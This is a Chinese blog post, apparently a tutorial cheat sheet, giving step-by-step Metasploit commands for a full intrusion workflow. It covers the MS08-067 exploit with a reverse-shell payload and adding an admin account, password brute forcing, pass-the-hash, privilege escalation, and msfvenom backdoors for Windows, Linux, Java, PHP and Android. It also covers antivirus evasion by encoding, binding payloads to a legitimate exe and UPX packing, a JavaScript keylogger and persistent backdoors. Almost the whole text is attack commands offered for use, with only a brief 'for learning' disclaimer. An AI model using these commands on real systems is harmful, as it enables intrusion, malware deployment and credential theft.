metasploit实操交流

最新推荐文章于 2025-01-20 20:23:29 发布
原创 最新推荐文章于 2025-01-20 20:23:29 发布 · 534 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了如何使用Metasploit进行端口扫描、SMB扫描获取系统信息、服务识别(SSH)、SNMP扫描与枚举、SMB和VNC身份验证等操作。内容涵盖基本命令和模块的使用,帮助读者理解渗透测试的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录


启动
msfconsole
更新
./msfupdate
退回上一级
quit

端口扫描:

调用Nmap扫描:可以参照一篇详细的文章戳我

基础扫描:

nmap -v -sV 加上要扫描的ip
调用msf模块扫描
使用search参数搜索相关模块:
search portscan

使用use参数调用其中一个模块进行搜索
use auxiliary/scanner/portscan/syn

使用show options参数设置模块详细参数
show options
通过set参数设置模块参数
1.set INTERFACE 网卡(ip)
2. set PORTS 端口
通过run参数开始扫描
run
注:Ctrl+c可以暂停扫描

SMB扫描_获取系统信息

启动
msfconsile

通过use参数启动smb扫描模块
use auxiliary/scanner/smb/smb_version
通过 show options参数设置模块参数
show options

需要设置的参数有ip和线程
set RHOST IP(你需要扫描的ip) set THREADS 10(线程一般是10,根据你电脑配置而定)
通过run参数启动模块
run

注:smb模块也可以扫描ip段,假如ip是192.168.1.1,要扫描多个ip可以set RHOS 192.168.1.1-200

服务识别(ssh)

启动
msfconsole

通过use参数启动服务识别模块
use auxiliary/scanner/ssh/ssh_version
通过 show options参数设置模块参数
show options
通过 show options参数设置模块参数
show options
需要设置ip
1.set RHOST IP(你需要扫描的ip),也可以扫描多个ip,只需要在要扫描的ip后面加上另一个IP就行了
2.
通过run参数启动模块
run

识别FTP的除了需要调用的模块不一样以外其他的都一样,就简单给出参数了。。。。。

  1. 调用;
    2.use auxiliary/scanner/ftp/ftp_version
  2. 设置参数:
    4.show options
    5.如果知道对方FTP账号就可以设置这个参数
  3. set FTPUSER
  4. 设置ip
    8.set RHOST IP
  5. 启动模块
    10.run

密码嗅探

启动
msfconsole
调用模块

use auxiliary/sniffer/psnuffle
设置参数
show options

不需要设置。。。。呵呵呵呵
通过run参数启动模块
run

SNMP扫描与枚举

启动
msfconsole
搜索模块

search snmp
调用扫描模块
use auxiliary/scanner/snmp/snmp_login

设置参数
show options
需要设置的参数有ip和线程
set RHOST IP(你需要扫描的ip) set THREADS 10(线程一般是10,根据你电脑配置而定)
通过run参数启动模块
run
调用枚举模块
use auxiliary/scanner/snmp/snmp_enum

设置参数
show options
需要设置的参数有ip和线程
set RHOST IP(你需要扫描的ip) set THREADS 10(线程一般是10,根据你电脑配置而定)
通过run参数启动模块
run

SMB登陆验证

启动
msfconsole
调用模块

use auxiliary/scanner/vnc/vnc_none_auth
设置参数
show options
需要设置的参数有ip和线程,登录账号
set RHOST IP(你需要扫描的ip/24) set THREADS 100(线程一般默认就好,电脑配置高的可以设置大) set SMBUser administraor(登录名可以自定义)
通过run参数启动模块
run

VNC身份验证

启动
msfconsole
调用模块

use auxiliary/scanner/vnc/vnc_none_auth
设置参数
show options
需要设置的参数有ip和线程
set RHOST IP(你需要扫描的ip) set THREADS 100(线程50-100,自己定义吧,端口一般默认不用自己设置)
通过run参数启动模块
run

远程代码执行

启动
msfconsole
搜索漏洞

search 08-067
调用模块
use exploit/windows/smb/ms08_067_netapi

设置参数
show options
需要设置被攻击者ip
set RHOST IP

设置攻击载荷
show payloads

调用攻击载荷
set payload windows/meterpreter/reverse_tcp(最好背下来,因为是常用载荷,直接拼出来就不用找,找起来太费时)

设置参数
show options
需要设置本地ip
set LHOST ip

每次设置完最好都能重新查看一下是否设置成功
show options

用info查看漏洞详情及影响版本
info

当然如果不知道被攻击者服务器版本可以用namp查看服务器版本号
nmap -O ip

只有08-067需要设置版本号,其他都可以自动识别版本号
set target 编号

再次检查
show options

开始利用漏洞
exploit

可以看到反弹,直接shell
shell

在cmd下添加一个账户
net user admin admin /add

提供入侵常用cmd一份~~~戳我

MJDJ文件解析远程代码执行

启动
msfconsole
搜索漏洞
search 12-004
调用模块
use exploit/windows/browser/ms12_004_midi
设置参数
show options
需要设置ip
set SRVHOST IP

可以修改伪装
set URIPATH /(可以是反斜杠也可以是文字,例如:好看的电影)

再次检查参数
show option

开始生成
exploit
如果出现端口被占用那么我们还需要修改端口
set LPORT 1244

再次检查参数
show option
开始生成
exploit
等待被攻击者机器连接。。。。。连接上了,我们查看会话
sessions

看到有一个会话,选择id连接会话
sessions -i id(id是1就选1)
获得shell
shell

然后想干嘛就干嘛咯

口令安全

启动
msfconsole
搜索模块

serach msql_login(这两个模块也都有,可以根据实际情况而定,格式是xxx_login(这个单词直译就是登录),ssh_login,ftp_login)
调用模块
use auxiliary/scanner/mysql/mysql_login

设置参数
show options
需要设置的参数有ip,用户名,字典,线程

  1. set RHOST IP(被攻击者)
  2. set USERNAME root
  3. set PASS_FILE 字典路径
  4. set THREAD 50

再次检查参数
show option
然后开始
exploit(如果成功了,就可以得出用户名和密码了,直接命令连接即可)

hash值传递渗透(相关内容戳我)

启动
msfconsole
调用模块

use/windows/smb/psexec
设置参数
show options
需要设置的参数有ip和用户名

  1. set RHOST IP(被攻击者)
  2. set SMMBUSER 用户名

再次检查参数
show option
执行
exploit

查看哈希值,复制它
hashdump

退出
exit

使用哈希值登录
set smbpass hash

执行
exploit
5.NDP内核提权(基于漏洞给低权限提权的会话)
前提条件有一个已经连接的的会话(session),但是其权限低
搜索提权模块
serarch 14-002
调用模块
use exploit/windows/local/ms_ndproxy

设置参数
show options
设置会话id提权
set session 1(id)

再次检查参数
show option
执行
exploit
提权完成后使用getuid查看当前权限
getuid

也可以获得shell之后使用get进行提权
getsystem

多种后门的生成

启动
msfconsole
a.Windows后门生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=端口 -f (格式)exe -o /((路径)自定义.exe

不要先发给被攻击者或者运行,要创建会话监听便于接受shell,搜索模块
search handler

调用模块
use exploit/mulit/handler

设置参数
show options
参数设置为创建所用的模块后门的参数
1.set payload windows/meterpreter/reverse_tcp
2.set LHOST IP
3.set LPORT 端口
创建会话监听完成,可以把生成的后门发给被攻击者了
b.linux生成后门
msfpayload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux

这里为了方便直接给靶机里的Linux777权限,列出目录,然后运行
1.chmod 777 linux
2. ls
3. ./linux

注意端口不能重复
一样的,设置会话监听
search handler
调用模块
use exploit/mulit/handler

设置参数
show options
参数设置为创建所用的模块后门的参数
set payload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux
1.set LHOST IP
2.set LPORT 端口
举一反三,java,php,等等的就给出代码参考
1.c.java后门的生成
2. msfpayload java/meterpreter/shell_reverse_tvp LHOST=IP LPORT=端口 W >123.jar
3.
4.d.php后门的生成
5. msfpayload java/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R | msfencode -e php/baes64 -t raw -o 123.php
6.上传到目标站-本地监听-目标访问服务器
7.
8.
9.e.安桌后门的生成
10. msfpayload android/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R >1.apk
11. 目标运行1.apk
12. 本地监听

内网渗透(获得shell前提下)

启动
msfconsole
获得shell扫描c段
1.run get_local_subnets 获取网卡
2. run autoroute -s ip 扫描c段
在有域的情况下,劫持域管理

  1. 调用:use incognito
  2. 设置:impersonate_token 域
  3. shell

调用嗅探模块

  1. use auxiliary/sniffer/psnuffle
  2. run

反反病毒(免杀)

启动
msfconsole
生成后门,以Windows为例,调用模块免杀
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai - t exe>123.exe
多次免杀(有时候多次免杀效果反而不好,因为免杀与次数无关)
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai -c 10 - t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe 10和5为免杀次数
绑定正常文件免杀
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai - k -c 10

加壳
upx -5 /1231.exe

特殊的xss(键盘记录)

启动
msfconsole
搜索模块

search keylogger
调用模块
use auxiliary/server/capture/http_javascript_keyloger

设置参数
show options

需要设置的参数有页面,这里启动启动官方演示
1.set DEMO true(意思是官方演示)
2. set URIPATH /(设置url)
3. set srvport 80(端口)
生成
run

维持访问(访问后门)

启动
msfconsole
调用模块

use exploit/multi/handler
生成payload方便连接会话
set payload windows/meterpreter/reverse_tcp

设置参数
show options
设置ip,端口

  1. set LHOST IP
  2. SET LPORT 1111

运行
run

获得后门
run metsvs -A

举例。。。。假如过段时间还想再次连接机器可以调用同样的模块,但是需要设置的东西就不一样了
调用模块
use exploit/multi/handler
生成payload
set payload windows/meterpreter/metsvs_bind_tcp
设置参数
show options
需要设置刚刚创建payload的端口和对方ip
1.set LPORT 31337
2. set RHOST IP

执行
exploit

可以启用键盘记录方便记录管理员密码
1.keyscan_start(键盘记录)
2. keyscan_dump(查看记录)

以上仅供学习参考

如有疑惑可以私信交流

【超详细】渗透测试平台Metasploit使用教程(框架介绍、靶机安装、基本使用方法)
fly_enum的博客
12-22 8974
Metasploitframework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
metasploit快速入门(一)安装部署
whatday的专栏
11-03 9113
目录 简介 1 在Windows上安装Metasploit 2在Linux和MacOS上安装Metasploit 3在Kali Linux上使用Metasploit 4升级Kali Linux 5构建渗透测试验环境 6配置SSH连接 7使用SSH连接到Kali 8配置PostgreSQL数据库 9创建工作区 10使用数据库 11 使用 hosts 命令 ...
MSF基础--show options
Ethan024的博客
07-03 2842
back回到上一级 search查找某个特定的渗透攻击,辅助或是攻击载荷模块 例如,使用命令搜索MS08-067漏洞(远程过程调用[RPC]服务的一个弱点)相关的模块: 使用use命令加载找到的模块: 使用show options显示ms08-67模块所需参数: ...
渗透测试-window反弹shell
lza20001103的博客
05-11 5324
window反弹shell
验报告五201521460014 综合渗透
weixin_33906657的博客
10-23 553
学号 中国人民公安大学 Chinese people’public security university 网络对抗技术 验报告 验五 综合渗透 学生姓名 张旺尧 年级 2015 区队 6 ...
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马(2)
m0_54903333的博客
04-29 490
输入命令:msfconsole输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:
网络侦察员职位专业技能测试
01-09
- **上机考试**:设置特定情境让考生独立完成指定的任务,像给定IP地址范围内的主机发现过程记录、基于已知CVE编号施针对性的漏洞验证验等等; - **案例研讨交流**:邀请面试者分享过往参与过的项目经历...
【Linux_Kali网络渗透测试学习笔记总结(六)】漏洞利用
数据库爆破专家的博客
04-30 4174
网络渗透测试(六):漏洞利用 编写漏洞利用程序(exploit) 的程序代码都不仅费时费力,而且代码的质量直接关系找整个工作环节的成败。因此,渗透人员需要根据目标环境的际情况对通过公开渠道获取的exploit程序进行相应调整。这种调整工作的技术含量很高,而且这类工作通常都是触类旁通的。掌握相应技能的人员可以举一反三地对很多程序进行调整。强烈建议读者在编写自己的漏洞利用程序之前,先通过公开渠道获取...
2025web建议
最新发布
Bulestardemon的博客
01-20 1030
新手入门路线推荐。
Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4
2401_84253894的博客
04-26 4295
Cobalt Strike是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。分为服务器和客户端,方便团队合作。cs服务器部署在公网控制着受害者主机,而攻击者可以直接访问cs服务器进而控制受害主机,不用再通过端口转发使用msf控制受害主机,简单方便!New Connection #新建连接,支持连接多个服务器端Preferences #设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录。
$.messager.show(options)
weixin_34126215的博客
09-05 164
2019独角兽企业重金招聘Python工程师标准>>> ...
未授权访问漏洞
C233333235的博客
08-04 1885
Redis 默认情况下,会绑定在,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下未授权Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件作,攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的/root/.ssh ⽂件夹的。
记录渗透靶场战【网络安全
Karka_的博客
12-28 981
关于免杀,我使用的全部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确没有执行成功,这说明360至少对第一个payload是拦截了的。lock脚本。
Metasploit使用教程
Kali与编程
03-23 2261
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于现对目标系统的控制。Metasploit支持多种不同的作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
羽翼metasploit第一,二季学习笔记
weixin_30379911的博客
03-07 408
-----------------第一季-------------------- 启动Metasploit:msfconsole 升级和更新:./msfupdate 直接退出:exit 退回上一级:quit1.端口扫描: a.调用Nmap扫描 nmap -v -sV ip b.调用msf模块扫描(1) use auxiliary/scanner/portsca...
torch.set_num_threads
热门推荐
jacke121的专栏
11-20 1万+
不设置,cpu51%,时间15ms 2的时候,cpu17%,时间15ms变为25ms 4的时候,cpu34%,时间17ms 8的时候,cpu67%, import time import torch import numpy as np while True: torch.set_num_threads(4) arr= np.zeros((100,3, 300,...
Metasploit设置LHOST参数技巧
大学霸__IT达人
03-24 7638
Metasploit设置LHOST参数技巧 当用户使用Metasploit框架中的模块时,经常需要配置LHOST参数。其中,LHOST参数用来指定本地主机IP地址。由于IP地址不容易记忆,而且输入也不方便。此时,用户可以使用接口名来代替,如setLHOSTeth0。当用户指定接口名后,将自动使用eth0接口的IP地址。 ...
Auxiliary模块使用(三)
weixin_43047908的博客
03-20 2242
VNC空密码扫描程序   这个模板将会扫描特定的网段,以搜索可以使用空密码访问的虚拟网络计算(VNC)服务器。 旨在帮助了解辅助工具模板在渗透测试过程中的重要作用 msf5 > use auxiliary/scanner/vnc/vnc_none_auth msf5 auxiliary(scanner/vnc/vnc_none_auth) > show options Module options (auxiliary/scanner/vnc/vnc_none_auth): Nam
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lao_wine

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值